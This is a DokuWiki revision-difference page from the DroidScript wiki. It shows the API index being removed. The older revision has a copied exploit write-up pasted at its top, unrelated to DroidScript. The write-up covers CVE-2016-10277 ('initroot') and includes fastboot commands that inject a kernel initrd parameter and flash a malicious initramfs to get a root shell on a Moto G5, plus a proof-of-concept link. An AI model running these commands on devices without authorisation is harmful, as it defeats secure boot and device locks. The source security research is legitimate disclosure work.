DroidScript Wiki

User Tools

Site Tools

Trace:
built_in:start

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

built_in:start [2018/12/30 13:41]
182.1.63.175 [Built-in features - DroidScript API] 		built_in:start [2018/12/31 01:07]
Line 1: Line 1:
-Sources: 
-https://alephsecurity.com/2017/08/30/untethered-initroot/ 
-https://github.com/alephsecurity/initroot 
  
-initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) 
- 
-By Roee Hay / Aleph Research, HCL Technologies 
- 
-Recap of the Vulnerability and the Tethered-jailbreak 
- 
-1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection. 
-2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address. 
-3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices). 
-4. Exploiting the vulnerability allows the adversary to gain unconfined root shell. 
-5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot. 
-For example, here is a successful run of the exploit on cedric (Moto G5) 
- 
-$ fastboot oem config fsg-id "a initrd=0xA2100000,1588598"  
-$ fastboot flash aleph initroot-cedric.cpio.gz  
-$ fastboot continue 
- 
-$ adb shell  
-cedric:/ # id 
-uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0 
-cedric:/ # getenforce 
-Permissive 
-cedric:/ # 
- 
- 
-Proof of Concept: 
-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42601.zip 
- 
-             
-====Links==== 
-^App and Layout^ 
-| [[app|app object]] | 
-| [[built_in:app_events|App Events]] | 
-| [[built_in:layouts|Layouts]]| 
-==== Controls ==== 
-^ Controls                                                   ^ 
-| [[built_in:audiorecorder|AudioRecorder control]]           | 
-| [[built_in:bluetoothlist|BluetoothList control]]           | 
-| [[built_in:bluetoothserial|BluetoothSerial control]]       | 
-| [[built_in:buttons|Button control]]                        | 
-| [[built_in:cameraview|CameraView control]]                 | 
-| [[built_in:checkboxes|CheckBoxes]]                         | 
-| [[built_in:crypt|Crypt control]]                           | 
-| [[built_in:database|Database control]]                     | 
-| [[built_in:dialog|Dialog control]]                         | 
-| [[built_in:downloader|Downloader]]                         | 
-| [[built_in:email|Email control]]                           | 
-| [[built_in:create_file|File control]]                      | 
-| [[built_in:glview|GLView control]]                         | 
-| [[built_in:images|Image control]]                          | 
-| [[built_in:ioio|IOIO control]]                             | 
-| [[built_in:listdialog|ListDialog control]]                 | 
-| [[built_in:lists|List control]]                            | 
-| [[built_in:listview|ListView]]                             | 
-| [[built_in:locator|Locator control]]                       | 
-| [[built_in:mediaplayer|MediaPlayer control]]               | 
-| [[built_in:mediastore|MediaStore control]]                 | 
-| [[built_in:netclient|NetClient control]]                   | 
-| [[built_in:notification|Notification control]]             | 
-| [[built_in:nxt|NXT control]]                               | 
-| [[built_in:nxtinfo|NxtInfo control]]                       | 
-| [[built_in:nxtremote|NxtRemote control]]                   | 
-| [[built_in:scroller|Scroller control]]                     | 
-| [[built_in:seekbars|Seekbar control]]                      | 
-| [[built_in:sensors|Sensor control]]                        | 
-| [[built_in:service|Service control]]                       | 
-| [[built_in:smartwatch|SmartWatch control]]                 | 
-| [[built_in:sms|SMS control]]                               | 
-| [[built_in:speechrecognition|Speech Recognition control]]  | 
-| [[built_in:spinner|Spinner control]]                       | 
-| [[built_in:synth|Synth control]]                           | 
-| [[built_in:tabs|Tabs control]]                             | 
-| [[built_in:text|Text control]]                             | 
-| [[built_in:textedit|TextEdit control]]                     | 
-| [[built_in:togglebuttons|ToggleButton control]]            | 
-| [[built_in:usbserial|USBSerial control]]                   | 
-| [[built_in:videoview|VideoView control]]                   | 
-| [[built_in:webserver|WebServer control]]                   | 
-| [[built_in:webview|WebView control]]                       | 
-| [[built_in:yesnodialog|YesNoDialog]]                       | 
-| [[built_in:zip|ZipUtil control]]                           | 
- 
----- 
- 
- 
-====Note for contributors==== 
-If you wish to create a new page in the **Built-in features** namespace, please create a link to the new page above, save this page and click on the link you just created. 
built_in/start.txt ยท Last modified: 2018/12/31 01:07 (external edit)

Page Tools

Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Share Alike 4.0 International
CC Attribution-Share Alike 4.0 International Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki